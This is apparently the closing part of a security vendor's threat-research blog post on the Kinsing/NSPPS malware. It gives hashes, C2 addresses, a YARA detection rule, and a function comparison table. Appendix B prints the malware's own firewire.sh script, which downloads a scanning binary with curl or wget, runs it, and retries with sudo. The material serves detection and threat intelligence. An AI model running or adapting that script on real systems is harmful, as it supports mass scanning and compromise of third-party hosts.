<p>When signing some of Kinsing artifacts and searching for new samples, we found a few dozen files that clearly contain a part of Kinsing&rsquo;s code, but are damaged as executables and cannot be run as proper ELF. Further examination helped us realize that those files are only a part of another sample, meaning someone cut the sample and uploaded it to VirusTotal. For example, the sample d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b is a known Kinsing sample that is 16.87 MB long, and the file a51a4398dd7f11e34ea4d896cde4e7b0537351f82c580f5ec951a8e7ea017865 that was uploaded to VirusTotal on June 19, 2020, was detected as Kinsing by some AV vendors, but is actually only the first 4.84 MB of the last sample.</p>
<p>These partial samples could be an attacker trying to test different parts of the malware against AV engines, or a security researcher examining sections of the code. So, to detect only proper ELFs, a condition should be added to match only files in which the sum of their sections header sizes matches the size of the entire file (check out the YARA rule down below).</p>
<p><strong>Appendix A: IOCs &amp; YARA</strong></p>
<p><strong>IOCs:</strong></p>
<table class="table table-bordered table-striped table-responsive-stack" width="100%">
<thead>
<tr>
<th width="80%">Indicator</th>
<th width="20%">Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>0b0aa978c061628ec7cd611edeec3373d4742cbda533b07a2b3eb84a9dd2cb8a</td>
<td>Sha256</td>
</tr>
<tr>
<td>0c811140be9f59d69da925a4e15eb630352fa8ad4f931730aec9ae80a624d584</td>
<td>Sha256</td>
</tr>
<tr>
<td>2132d7bed60fda38adda28efdbbd2df2c9379fed5de2e68fc6801f5621b596b0</td>
<td>Sha256</td>
</tr>
<tr>
<td>4b0138c12e3209d8f9250c591fcc825ee6bff5f57f87ed9c661df6d14500e993</td>
<td>Sha256</td>
</tr>
<tr>
<td>4f4e69abb2e155a712df9b3d0387f9fb2d6db8f3a2c88d7bbe199251ec08683f</td>
<td>Sha256</td>
</tr>
<tr>
<td>5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6</td>
<td>Sha256</td>
</tr>
<tr>
<td>511de8dd7f3cb4c5d88cd5a62150e6826cb2f825fa60607a201a8542524442e2</td>
<td>Sha256</td>
</tr>
<tr>
<td>554c233d0e034b8bb3560b010f99f70598f0e419e77b9ce39d5df0dd3bc25728</td>
<td>Sha256</td>
</tr>
<tr>
<td>655ee9ddd6956af8c040f3dce6b6c845680a621e463450b22d31c3a0907727e4</td>
<td>Sha256</td>
</tr>
<tr>
<td>6814d22be80e1475e47e8103b11a0ec0daa3a9fdd5caa3a0558d13dc16c143d9</td>
<td>Sha256</td>
</tr>
<tr>
<td>681f88d79c3ecab8683b39f8107b29258deb2d58fcea7b0c008bab76e18aa607</td>
<td>Sha256</td>
</tr>
<tr>
<td>6e8c96f9e9a886fd6c51cce7f6c50d1368ca5b48a398cc1fedc63c1de1576c1e</td>
<td>Sha256</td>
</tr>
<tr>
<td>7727a0b47b7fd56275fa3c1c4468db7fa201c788d1e56597c87deaff45aad634</td>
<td>Sha256</td>
</tr>
<tr>
<td>7f9f8209dc619d686b32d408fed0beb3a802aa600ddceb5c8d2a9555cdb3b5e0</td>
<td>Sha256</td>
</tr>
<tr>
<td>8c9b621ba8911350253efc15ab3c761b06f70f503096279f2a173c006a393ee1</td>
<td>Sha256</td>
</tr>
<tr>
<td>98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c</td>
<td>Sha256</td>
</tr>
<tr>
<td>9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc</td>
<td>Sha256</td>
</tr>
<tr>
<td>a0363f3caad5feb8fc5c43e589117b8053cbf5bc82fc0034346ea3e3984e37e8</td>
<td>Sha256</td>
</tr>
<tr>
<td>a5b010a5dd29d2f68ac9d5463eb8a29195f40f5103e1cc3353be2e9da6859dc6</td>
<td>Sha256</td>
</tr>
<tr>
<td>b44dae9d1ce0ebec7a40e9aa49ac01e2c775fa9e354477a45b723c090b5a28f2</td>
<td>Sha256</td>
</tr>
<tr>
<td>b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f</td>
<td>Sha256</td>
</tr>
<tr>
<td>c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76</td>
<td>Sha256</td>
</tr>
<tr>
<td>c9932ca45e952668238960dbba7f01ce699357bedc594495c0ace512706dd0ac</td>
<td>Sha256</td>
</tr>
<tr>
<td>ccfda7239b2ac474e42ad324519f805171e7c69d37ad29265c0a8ba54096033d</td>
<td>Sha256</td>
</tr>
<tr>
<td>d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b</td>
<td>Sha256</td>
</tr>
<tr>
<td>db3b9622c81528ef2e7dbefb4e8e9c8c046b21ce2b021324739a195c966ae0b7</td>
<td>Sha256</td>
</tr>
<tr>
<td>f2e7244e2a7d6b28b1040259855aeac956e56228c41808bccb8e37d87c164570</td>
<td>Sha256</td>
</tr>
<tr>
<td>104.248.3.165</td>
<td>C2</td>
</tr>
<tr>
<td>139.99.50.255</td>
<td>C2</td>
</tr>
<tr>
<td>185.61.7.8</td>
<td>C2</td>
</tr>
<tr>
<td>188.120.254.224</td>
<td>C2</td>
</tr>
<tr>
<td>193.33.87.220</td>
<td>C2</td>
</tr>
<tr>
<td>195.123.220.193</td>
<td>C2</td>
</tr>
<tr>
<td>45.10.88.102</td>
<td>C2</td>
</tr>
<tr>
<td>46.229.215.164</td>
<td>C2</td>
</tr>
<tr>
<td>46.243.253.167</td>
<td>C2</td>
</tr>
<tr>
<td>47.65.90.240</td>
<td>C2</td>
</tr>
<tr>
<td>62.113.112.127</td>
<td>C2</td>
</tr>
<tr>
<td>67.205.161.58</td>
<td>C2</td>
</tr>
<tr>
<td>91.215.169.111</td>
<td>C2</td>
</tr>
</tbody>
</table>
<p><strong>YARA:</strong></p>
<pre class="enl" data-enlighter-language="raw">
import &quot;elf&quot;

rule Kinsing_Malware
{
	meta:
		author = &quot;Aluma Lavi, CyberArk&quot;
		date = &quot;22-01-2021&quot;
		version = &quot;1.0&quot;
		hash = &quot;d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b&quot;
		description = &quot;Kinsing/NSPPS malware&quot;
	strings:
		$rc4_key = { 37 36 34 31 35 33 34 34 36 62 36 31 }
		$firewire = &quot;./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT&quot;
		$packa1 = &quot;google/btree&quot; ascii wide
		$packa2 = &quot;kardianos/osext&quot; ascii wide
		$packa3 = &quot;kelseyhightower/envconfig&quot; ascii wide
		$packa4 = &quot;markbates/pkger&quot; ascii wide
		$packa5 = &quot;nu7hatch/gouuid&quot; ascii wide
		$packa6 = &quot;paulbellamy/ratecounter&quot; ascii wide
		$packa7 = &quot;peterbourgon/diskv&quot; ascii wide
		$func1 = &quot;main.RC4&quot; ascii wide
		$func2 = &quot;main.runTaskWithScan&quot; ascii wide
		$func3 = &quot;main.backconnect&quot; ascii wide
		$func4 = &quot;main.downloadAndExecute&quot; ascii wide
		$func5 = &quot;main.startCmd&quot; ascii wide
		$func6 = &quot;main.execTaskOut&quot; ascii wide
		$func7 = &quot;main.minerRunningCheck&quot; ascii wide
	condition:
		(uint16(0) == 0x457F
		and not (elf.sections[0].size + elf.sections[1].size + elf.sections[2].size + elf.sections[3].size + elf.sections[4].size + elf.sections[5].size + elf.sections[6].size + elf.sections[7].size &gt; filesize))
		and ($rc4_key
		or $firewire
		or all of ($packa*)
		or 4 of ($func*)
		)
}
	</pre>
<p><strong>Appendix B: Firewire.sh Script</strong></p>
<pre class="enl" data-enlighter-language="raw">#!/bin/sh
		PORT=$1
		RATE=$2
		INPUT=$3
		OUTPUT=$4
		MASSCAN=$5

		cat /etc/os-release | grep -vw grep | grep &quot;rhel&quot; &gt;/dev/null
		if [ $? -eq 0 ]
		then
		rpm -qa | grep libpcap-dev &gt; /dev/null
		if [[ $? -eq 0 ]]; then
		echo &quot;Package is installed rhel!&quot;
		else
		echo &quot;Package is NOT installed rhel!&quot;
		yum -y update 
		yum -y install  libpcap-devel
		fi
		else
		if [ $(dpkg-query -W -f=&#39;${Status}&#39; libpcap-dev 2&gt;/dev/null | grep -c &quot;ok installed&quot;) -eq 0 ];
		then
		echo &quot;Package is NOT installed deb!&quot;
		apt-get update
		apt-get install -y libpcap-dev
		else
		echo &quot;Package is installed deb!&quot;
		fi
		fi

		if [ -x &quot;$(command -v md5sum)&quot; ]; then
		sum=$(md5sum firewire | awk &#39;{ print $1 }&#39;)
		echo $sum
		case $sum in
		45a7ef83238f5244738bb5e7e3dd6299)
		echo &quot;firewire OK&quot;
		;;
		*)
		echo &quot;firewire wrong&quot;
		(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
		;;
		esac
		else
		echo &quot;No md5sum&quot;
		(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
		fi

		chmod +x firewire

		./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2&gt;/dev/null
		if [ $? -eq 0 ]
		then
		echo &quot;success&quot;
		else
		echo &quot;fail&quot;
		sudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2&gt;/dev/null
		if [ $? -eq 0 ]
		then
		echo &quot;success2&quot;
		else
		echo &quot;fail2&quot;
		fi
		fi
	</pre>
<p><strong>Appendix C: NSPPS &amp; Kinsing Function list</strong></p>
<table class="table table-bordered table-striped table-responsive-stack" width="100%">
<thead>
<tr>
<th width="50%">NSPPS</th>
<th width="50%">Kinsing</th>
</tr>
</thead>
<tbody>
<tr>
<td>DownloadFile</td>
<td>DownloadFile</td>
</tr>
<tr>
<td>ExecOutput</td>
<td>ExecOutput</td>
</tr>
<tr>
<td>Hosts</td>
<td>Hosts</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>Pid</td>
</tr>
<tr>
<td>RC4</td>
<td>RC4</td>
</tr>
<tr>
<td>RandStringRunes</td>
<td>RandStringRunes</td>
</tr>
<tr>
<td>Result</td>
<td>Result</td>
</tr>
<tr>
<td>SetSocks</td>
<td>SetSocks</td>
</tr>
<tr>
<td>Specification</td>
<td>Specification</td>
</tr>
<tr>
<td>TargetsWrapper</td>
<td>TargetsWrapper</td>
</tr>
<tr>
<td>Task</td>
<td>Task</td>
</tr>
<tr>
<td>TaskPair</td>
<td>TaskPair</td>
</tr>
<tr>
<td>addResult</td>
<td>addResult</td>
</tr>
<tr>
<td>backconnect</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>checkHealth</td>
<td>checkHealth</td>
</tr>
<tr>
<td>connectForSocks</td>
<td>connectForSocks</td>
</tr>
<tr>
<td>contains</td>
<td>contains</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>copyFileContents</td>
</tr>
<tr>
<td>doRequestWithTooManyOpenFiles</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>doTask</td>
<td>doTask</td>
</tr>
<tr>
<td>downloadAndExecute</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>encStruct</td>
<td>encStruct</td>
</tr>
<tr>
<td>execTask</td>
<td>execTask</td>
</tr>
<tr>
<td>execTaskOut</td>
<td>execTaskOut</td>
</tr>
<tr>
<td>getActiveC2CUrl</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>getMinerPid</td>
</tr>
<tr>
<td>getOrCreateListForTaskResult</td>
<td>getOrCreateListForTaskResult</td>
</tr>
<tr>
<td>getOrCreateRateCounterForTask</td>
<td>getOrCreateRateCounterForTask</td>
</tr>
<tr>
<td>getOrCreateUuid</td>
<td>getOrCreateUuid</td>
</tr>
<tr>
<td>getTargets</td>
<td>getTargets</td>
</tr>
<tr>
<td>getTask</td>
<td>getTask</td>
</tr>
<tr>
<td>getWriteableDir</td>
<td>getWriteableDir</td>
</tr>
<tr>
<td>go</td>
<td>go</td>
</tr>
<tr>
<td>hash_file_md5</td>
<td>hash_file_md5</td>
</tr>
<tr>
<td>healthChecker</td>
<td>healthChecker</td>
</tr>
<tr>
<td>inc</td>
<td>inc</td>
</tr>
<tr>
<td>init</td>
<td>init</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>isMinerRunning</td>
</tr>
<tr>
<td>main</td>
<td>main</td>
</tr>
<tr>
<td>makeClient</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>masscan</td>
<td>masscan</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>minRun</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>minerRunningCheck</td>
</tr>
<tr>
<td>move</td>
<td>move</td>
</tr>
<tr>
<td>randIntRange</td>
<td>randIntRange</td>
</tr>
<tr>
<td>redisBrute</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>request</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>resultSender</td>
<td>resultSender</td>
</tr>
<tr>
<td>runTask</td>
<td>runTask</td>
</tr>
<tr>
<td>runTaskWithHttp</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>runTaskWithScan</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>runcmd</td>
<td>runcmd</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>sendMinerPid</td>
</tr>
<tr>
<td>sendResult</td>
<td>sendResult</td>
</tr>
<tr>
<td>sendSocks</td>
<td>sendSocks</td>
</tr>
<tr>
<td>setActiveC2CUrl</td>
<td>setActiveC2CUrl</td>
</tr>
<tr>
<td>setExecOutput</td>
<td>setExecOutput</td>
</tr>
<tr>
<td>setLog</td>
<td>setLog</td>
</tr>
<tr>
<td>setUuid</td>
<td>setUuid</td>
</tr>
<tr>
<td>socks</td>
<td>socks</td>
</tr>
<tr>
<td>startCmd</td>
<td>startCmd</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>startCmdWithOutputSingle</td>
</tr>
<tr>
<td>startSocks</td>
<td>startSocks</td>
</tr>
<tr>
<td>syncCmd</td>
<td>syncCmd</td>
</tr>
<tr>
<td>taskScan</td>
<td>taskScan</td>
</tr>
<tr>
<td>taskWithHttpWorker</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>taskWithScanWorker</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>taskWorker</td>
<td>taskWorker</td>
</tr>
<tr>
<td>tcpTask</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>updateTask</td>
<td>updateTask</td>
</tr>
<tr>
<td>writable</td>
<td>writable</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
</div>
</article>
<div id="default-next-button-wrapper">
<div class="item-next-prev">
<div class="item-prev">
<div class="arrow"><span></span></div>
<div class="preview">
<h6>Previous Article</h6>
<div class="meta-top">
<div class="prev-next"><img alt="The Mysterious Realm of JavaScriptCore" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F03%2FThe-Realm-of-JavaScriptCore.jpeg&size=1&version=1646897450&sig=0229b68d3737acf32f61173f0967ea51&default=hubs%2Ftilebg-blogs.jpg"></div> <span class="title">The Mysterious Realm of JavaScriptCore</span>
<p>TL;DR JavaScriptCore (JSC) is the JavaScript engine used by Safari, Mail, App Store and many other apps in ...</p>
</div>
</div>
<a href="https://www.cyberark.com/resources/threat-research-blog/the-mysterious-realm-of-javascriptcore" data-item-id="650541901" data-internal="blogpost" data-page-title="The Mysterious Realm of JavaScriptCore"></a>
</div>
<div class="item-next">
<div class="arrow"><span></span></div>
<div class="preview">
<h6>Next Article</h6>
<div class="meta-top">
<div class="prev-next"><img alt="The Strange Case of How We Escaped the Docker Default Container" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F02%2FThe-Strange-Case-of-the-Docker-Container.jpeg&size=1&version=1640142383&sig=a9581ceb752d606187fcd6edcc5a7260&default=hubs%2Ftilebg-blogs.jpg"></div> <span class="title">The Strange Case of How We Escaped the Docker Default Container</span>
<p>TL;DR During an internal container-based Red Team engagement, the Docker default container spontaneously an...</p>
</div>
</div>
<a href="https://www.cyberark.com/resources/threat-research-blog/the-strange-case-of-how-we-escaped-the-docker-default-container" data-item-id="649387958" data-internal="blogpost" data-page-title="The Strange Case of How We Escaped the Docker Default Container"></a>
</div>
</div>
</div>
</section>
</div>
<div class="cta-item-container">
 <div class="tile single cta cta-website uf-aspect-ratio-fix item" id="hub-cta-401459" data-cta-id="401459" data-cta-name="2021 Gartner MQ Promo" data-aspect-ratio="0.043103448275862" style="background: #4D4D4D url(https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9Y3RhX2JhY2tncm91bmQmY3RhX2lkPTQwMTQ1OSZtb2RpZmllZD0yMDIxLTA3LTIxIDExOjMzOjQ2JnNpZz1mZTg0NGZiMzIzYmI1YWY4NTJmYmEzMjJlMTk3NWY2Yg%253D%253D) center top / cover;">
<p style="color:#ffffff;  ">Gartner Names CyberArk a Leader in the 2021 Magic Quadrant for PAM</p>
<a style="color:#ffffff;background-color:#6aae45" class="cta-button accent-button" data-cta-id="401459" href="https://www.cyberark.com/resources/analyst-reports/2021-gartner-magic-quadrant-for-privileged-access-management" data-internal="false">Download Now</a>
</div>
</div>
<div style="clear:both; height:0; overflow: hidden;"></div>
<div class="related-items-container  item-contents-with-cta">
<h2 class="hub-heading" id="related-items-heading">Recommended for You</h2>
<section id="related-items" class="related">
<ul class="carousel-nav">
<li class="prev"><a id="relatedNavPrev" class="carousel-control left" href="#related-items-carousel" data-slide="prev">&lsaquo;</a></li>
<li class="next"><a id="relatedNavNext" class="carousel-control right" href="#related-items-carousel" data-slide="next">&rsaquo;</a></li>
</ul>
<div class="related-container">
<div id="related-items-carousel" class="carousel">
<div class="carousel-inner">
<div data-id="674289507" data-source-stream-id="6824673" data-tags="Threat Research" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview674289507"><img alt="Conti Group Leaked!" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2022%2F03%2FConti-Group-Leak.png&size=1&version=1646249809&sig=1b47c997dbd4d6a107072db1b94900fc&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-03-02T13:12:00"></abbr></div> <div class="h3like  ">Conti Group Leaked!</div>
<h4 class=""><p>The conflict in Ukraine has driven significant attention from the cybersecurity community, due in large part to the cyber attacks conducted against Ukraine infrastructure &mdash; including evidence of...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked" data-page-title="Conti Group Leaked!" data-seo-title="Conti Group Leaked!" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked" data-internal="blogpost" data-seo-title="Conti Group Leaked!" data-page-title="Conti Group Leaked!"></a>
</div>
<div data-id="673186767" data-source-stream-id="6824673" data-tags="Threat Research,Blog,Threat Research Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview673186767"><img alt="How Docker Made Me More Capable and the Host Less Secure" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2022%2F02%2FDocker-1.png&size=1&version=1644368057&sig=d5f41c9c99825f5eb51ba5720d2687e0&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-02-08T18:03:00"></abbr></div> <div class="h3like  ">How Docker Made Me More Capable and the Host Less Secure</div>
<h4 class="long-h3"><p>TL;DR After Docker released a fix [1] for CVE-2021-21284 [2], it unintentionally created a new vulnerability that allows a low-privileged user on the host to execute files from Docker images....</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/how-docker-made-me-more-capable-and-the-host-less-secure" data-page-title="How Docker Made Me More Capable and the Host Less Secure" data-seo-title="How Docker Made Me More Capable and the Host Less Secure" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/how-docker-made-me-more-capable-and-the-host-less-secure" data-internal="blogpost" data-seo-title="How Docker Made Me More Capable and the Host Less Secure" data-page-title="How Docker Made Me More Capable and the Host Less Secure"></a>
</div>
<div data-id="672811311" data-source-stream-id="6824673" data-tags="Threat Research,Blog,Threat Research Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview672811311"><img alt="Checking for Vulnerable Systems for CVE-2021-4034 with PwnKit-Hunter" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2022%2F02%2FPolkit-Threat-Research.jpg&size=1&version=1643940452&sig=acbddf71e4841afe84144b99ea57d7fd&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-02-01T09:41:00"></abbr></div> <div class="h3like  ">Checking for Vulnerable Systems for CVE-2021-4034 with PwnKit-Hunter</div>
<h4 class="long-h3"><p>What is PwnKit Vulnerability CVE-2021-4034? On January 25th, 2022, a critical vulnerability in polkit&rsquo;s pkexec was publicly disclosed (link). The Qualys research team named this vulnerability...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/checking-for-vulnerable-systems-for-cve-2021-4034-with-pwnkit-hunter" data-page-title="Checking for Vulnerable Systems for CVE-2021-4034 with PwnKit-Hunter" data-seo-title="Checking for Vulnerable Systems for CVE-2021-4034 with PwnKit-Hunter" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/checking-for-vulnerable-systems-for-cve-2021-4034-with-pwnkit-hunter" data-internal="blogpost" data-seo-title="Checking for Vulnerable Systems for CVE-2021-4034 with PwnKit-Hunter" data-page-title="Checking for Vulnerable Systems for CVE-2021-4034 with PwnKit-Hunter"></a>
</div>
<div data-id="672763482" data-source-stream-id="6824673" data-tags="Threat Research,Blog,Threat Research Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview672763482"><img alt="Analyzing Malware with Hooks, Stomps and Return-addresses" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2022%2F01%2Fanalyzing-malware-featured-image-hook.png&size=1&version=1643658423&sig=0afb102ddca6d5015328233fbf5a2835&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-01-31T13:30:00"></abbr></div> <div class="h3like  ">Analyzing Malware with Hooks, Stomps and Return-addresses</div>
<h4 class="long-h3"><p>Table of Contents Introduction The First Detection The Module Stomp Bypass The Module Stomp Detection Final Thoughts Introduction This is the second post in my series and with this post we will...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/analyzing-malware-with-hooks-stomps-and-return-addresses-2" data-page-title="Analyzing Malware with Hooks, Stomps and Return-addresses" data-seo-title="Analyzing Malware with Hooks, Stomps and Return-addresses" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/analyzing-malware-with-hooks-stomps-and-return-addresses-2" data-internal="blogpost" data-seo-title="Analyzing Malware with Hooks, Stomps and Return-addresses" data-page-title="Analyzing Malware with Hooks, Stomps and Return-addresses"></a>
</div>
<div data-id="671800881" data-source-stream-id="6824673" data-tags="Threat Research" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview671800881"><img alt="Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2022%2F01%2Ftsk-hero.jpeg&size=1&version=1642021623&sig=9b7c69be6f011d90a17547275b3bd352&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-01-11T18:07:00"></abbr></div> <div class="h3like  ">Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more</div>
<h4 class="long-h3"><p>In this blog post we are going to discuss the details of a vulnerability in Windows Remote Desktop Services, which we recently uncovered. We reported the vulnerability to Microsoft in a...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside" data-page-title="Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more" data-seo-title="Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file sys" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside" data-internal="blogpost" data-seo-title="Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file sys" data-page-title="Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more"></a>
</div>
<div data-id="671585712" data-source-stream-id="6824673" data-tags="Blog,Threat Research Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview671585712"><img alt="Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F12%2Fdont-trust-hero.jpg&size=1&version=1641936220&sig=e7632b54602346f4d68ced785edd3590&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-01-06T16:51:00"></abbr></div> <div class="h3like  ">Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters</div>
<h4 class="long-h3"><p>One day, while I was working on OpenShift, a Kubernetes distribution by RedHat focused on developer experience and application security, I noticed that I was able to inject ANSI escape characters...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/dont-trust-this-title-abusing-terminal-emulators-with-ansi-escape-characters" data-page-title="Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters" data-seo-title="Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/dont-trust-this-title-abusing-terminal-emulators-with-ansi-escape-characters" data-internal="blogpost" data-seo-title="Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters" data-page-title="Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters"></a>
</div>
<div data-id="670360995" data-source-stream-id="6824673" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview670360995"><img alt="Hook Heaps and Live Free" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F11%2Fhook-heaps-featured-img.png&size=1&version=1639000680&sig=23c260b5a64d9852ad4dd94d7414cdfa&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-12-08T16:56:00"></abbr></div> <div class="h3like  ">Hook Heaps and Live Free</div>
<h4 class=""><p><body><p>I wanted to write this blog post to talk a bit about Cobalt Strike, function hooking and the Windows heap. &nbsp;We will be targeting BeaconEye (<em>https://github.com/CCob/BeaconEye)</em> as our detection tool...</p><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body></p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/hook-heaps-and-live-free" data-page-title="Hook Heaps and Live Free" data-seo-title="Hook Heaps and Live Free" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/hook-heaps-and-live-free" data-internal="blogpost" data-seo-title="Hook Heaps and Live Free" data-page-title="Hook Heaps and Live Free"></a>
</div>
<div data-id="668823491" data-source-stream-id="6824673" data-tags="Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview668823491"><img alt="Cloud Shadow Admins Revisited in Light of Nobelium" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F11%2FCloud-Shadow-Admins.png&size=1&version=1640142384&sig=4573bc25ddd2ea491ec486379e415908&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-11-03T11:33:00"></abbr></div> <div class="h3like  ">Cloud Shadow Admins Revisited in Light of Nobelium</div>
<h4 class="long-h3"><p>A recently detected attack campaign involving threat actor Nobelium has caught our attention due to an attack vector our team has previously researched &ndash; Cloud Shadow Admins &ndash; that the adversary...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/cloud-shadow-admins-revisited-in-light-of-nobelium" data-page-title="Cloud Shadow Admins Revisited in Light of Nobelium" data-seo-title="Cloud Shadow Admins Revisited in Light of Nobelium" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/cloud-shadow-admins-revisited-in-light-of-nobelium" data-internal="blogpost" data-seo-title="Cloud Shadow Admins Revisited in Light of Nobelium" data-page-title="Cloud Shadow Admins Revisited in Light of Nobelium"></a>
</div>
<div data-id="668493470" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
